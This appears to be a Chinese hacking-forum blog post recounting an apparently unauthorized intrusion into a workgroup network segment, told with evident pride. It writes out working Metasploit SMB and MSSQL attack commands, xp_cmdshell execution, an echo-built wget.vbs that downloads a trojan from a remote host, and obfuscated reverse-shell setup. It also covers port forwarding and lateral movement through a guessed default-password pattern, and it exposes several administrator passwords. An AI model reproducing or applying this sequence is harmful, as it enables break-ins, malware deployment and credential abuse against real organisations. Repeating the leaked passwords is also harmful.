最新消息:

记一次在工作组的渗透 by wilson

别人经典渗透过程学习 admin 2986浏览 0评论
2014-07-31 红客联盟

文章来自@wilson

一)getwebshell

Getshell—>直接ewebeditor对config.asp可编辑。

这个不是重点 我粗略一讲 ewebeditor默认账户登入,可编辑config.asp 直接插马;

外围服务器:xxx.xxx.64.33

 

 

=======================================

 

 

二)提权

上传cmd.com就可以执行命令了 pr.exe提了

 

========================================

 

 

三)在工作组中的渗透

 

本地做了策略 我登不上去3389 关了各种策略 没有用 估计是硬防了 = =人品啊

 

尼玛 netstat -ano 看见很多端口 就是telnet 不上去。

 

后来发现整个段都是做了硬防的样子,扫不到一些重要端口。。。

 

算了 不登上去了 = = 直接用msf搞吧 用veil 生成一个免杀tcp反弹shell的payload[ veil免杀神器。。。]

 

——————————–

 

利用Msf进行渗透

 

连接上vpn,就有公网ip啦 然后 监听一个端口 我喜欢1433 不知道为什么 = =||| 我老是监听端口时候外面连接不上,当我监听了1433 就可以连接上了。。。所以我常常选择这个端口。。。

 

—————————————–

进一步

——————————————

 

收集本机的密码

 

1.hashdump:

Administrator:sntcm33tao

2.扫描端口试试:

要加一个路由表,不加,你在外面扫扫不到什么东西的 = = 就是这样。。。。 route add xxx.xxx.64.0 255.255.255.0 session值

 

 

因为arp扫不了存活的主机【估计做了什么策略】

加载模块,设置测试,扫一些常见端口。。。

 

扫的数据 被存在了数据库里面了!! 我们可以通过hosts 和services命令来访问

 

 

 

3.开始漏洞测试

 

———————-445端口—————–

 

msf溢出还没打 好耗时间。。偷个懒好了 呵呵

– -||| 尝试SBM登入:加入自己在那个服务器上抓的密码:sntcm33tao

msf > use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) > set RHOSTS xxx.xxx.64.1-254 RHOST => xxx.xxx.64.1-254 msf auxiliary(smb_login) > set SMBPass sntcm33tao SMBPass =>sntcm33tao msf auxiliary(smb_login) > set SMBUser administrator SMBUser => administrator msf auxiliary(smb_login) > exploit

尼玛 结果发现自己服务器密码没有用上 – – 唉 伤心 – –

 

—————1433端口——————

 

 

用service -p 端口 -R导出结果到文件中

注意这个是自动加载到你现在使用对应的模块的!

进行myssql弱口令爆破 尼玛走运了。。。有三个弱口令 哈哈哈~~~

 

很好 心里暗喜,估计着这个段的管理员 认为做了硬防就出现空口令的这种失误了 呵呵,这个突破点要好好利用

 

 

——————————————————————

好,接下来看看怎么利用这个漏洞 三个方法。。

 

一)反弹一个shell

 

 

但是exploit出现了

 

[-] Exploit failed: EOFError EOFError 我擦 失败了

xxx.xxx.64.24 是不是有杀软?? = =?? 尼玛。。。。。。。。 –

 

 

——————-

 

算了 我先看看xxx.xxx.64.55可以么?

还是[-] Exploit failed: EOFError EOFErrorr我擦 居然也是不行。。

 

 

————————

 

好吧,看看能不能用bind_tcp试试 set PAYLOAD windows/meterpreter/bind_tcp 不行 0 0 法克 = =|||

 

 

二) 好吧 换思路 – -执行命令 use admin/mssql/mssql_exec 执行命令好了 – – set RHOST => xxx.xxx.64.24 msf auxiliary(mssql_exec) > set CMD cmd.exe /c net user CMD => cmd.exe /c net user msf auxiliary(mssql_exec) > exploit SQL Query: EXEC master..xp_cmdshell ‘cmd.exe /c net user’ output –

Administrator ASPNET Guest IUSR_XINLI IWAM_XINLI SQLDebugger SUPPORT_388945a0 }T?N??L??[?k ?FO?SuN*NbY*N???0

 

我擦可以撒 O(∩_∩)O哈哈哈~~~~~ 现在想着写一个wget.vbs 看看能不能下载马 种马试试看。。。

 

echo iLocal=LCase(Wscript.Arguments(1)) >>c:\\wget.vbs echo iRemote=LCase(Wscript.Arguments(0)) >>c:\\wget.vbs echo wscript.echo “[!]GET “,iRemote >>c:\\wget.vbs echo set xPost=CreateObject(“Microsoft.XMLHTTP”) >>c:\\wget.vbs echo xPost.Open “GET”,iRemote,0 >>c:\\wget.vbs echo xPost.Send() >>c:\\wget.vbs echo set sGet=CreateObject(“ADODB.Stream”) >>c:\\wget.vbs echo sGet.Mode=3 >>c:\\wget.vbs echo sGet.Type=1 >>c:\\wget.vbs echo sGet.Open() >>c:\\wget.vbs echo sGet.Write xPost.ResponseBody >>c:\\wget.vbs echo sGet.SaveToFile iLocal,2 >>c:\\wget.vbs SQL Query: EXEC master..xp_cmdshell ‘type C:\wget.vbs’ output ————— iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) wscript.echo [!]GET ,iRemote set xPost=CreateObject(Microsoft.XMLHTTP) xPost.Open GET,iRemote,0 xPost.Send() set sGet=CreateObject(ADODB.Stream) sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile iLocal,2

 

 

尼玛累死哥了 执行一下看看

cscript //nologo C:\\wget.vbs 你的马地址 C:\\windows\\马的名字.exe 我擦还是居然不可以 尼玛啊。。 是不是wget.vbs 给杀了 我擦 蛋疼啊 T_T –

 

 

———————————————————————–

 

三)Lcx.exe 转发好了

 

= =||| 我应该早点登xxx.xxx.64.24 的3389 用SQLTOOLS2.0.exe 登入xxx.xxx.64.24 和xxx.xxx.64.55

 

Getpass抓密码:

xxx.xxx.64.55的UserName: Administrator password: www

xxx.xxx.64.24 UserName: Administrator password: sntcm24tao

====================================

 

 

4.扩大权限

 

看到xxx.xxx.64.24的密码 我惊呆啦 仔细一下xxx.xxx.64.33 密码是:sntcm33tao 看到这里一个就明白了 这个c段应该是 有默认密码的 规则就是: xxx.xxx.64.xxxx administrator:sntcmxxxtao了

 

开始写脚本搞吧

 

,参考网站 http://blog.spiderlabs.com/2012/06/metasploit-tipstrickshashes-and-tokens.html

 

 

 

运行结果:

 

 

 

很好 用creds 看看成功几个

 

12,24,28,29,34 都搞定了 另外11用3389登入也是可以搞定的 有的不成功 是管理员改了密码了。。。 像xxx.xxx.64.55 那个 就是改成了www

 

 

———————————-

接着bind_tcp 批量弹回会话 这个脚本和前面的差不多了

 

 

 

 

结果:

 

 

搞到了5个会话 哈哈 很好~~~ Lcx登3389上去看看 嘚瑟一下有成就感!!

 

 

 

三)没有总结的总结

 

文章突破点

  1. 由于策略防范,所以用msf进行继续了类似内网的渗透 加了一个路由表,进入c段
  2. mssql的弱口令登入。。。这个是重要突破点
  3. 利用简单社工 来扩大权限
  4. 人品 渗透很靠人品的。。。 虽然运气有很大成分 但是思路才是重点啊!

还有很多技术没有用上 像嗅探什么的 但是不想搭时间进去了 还是可以用这些时间学习其它的技术什么的 参考文章

http://blog.spiderlabs.com/2012/06/metasploit-tipstrickshashes-and-tokens.html

转载请注明:jinglingshu的博客 » 记一次在工作组的渗透 by wilson


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址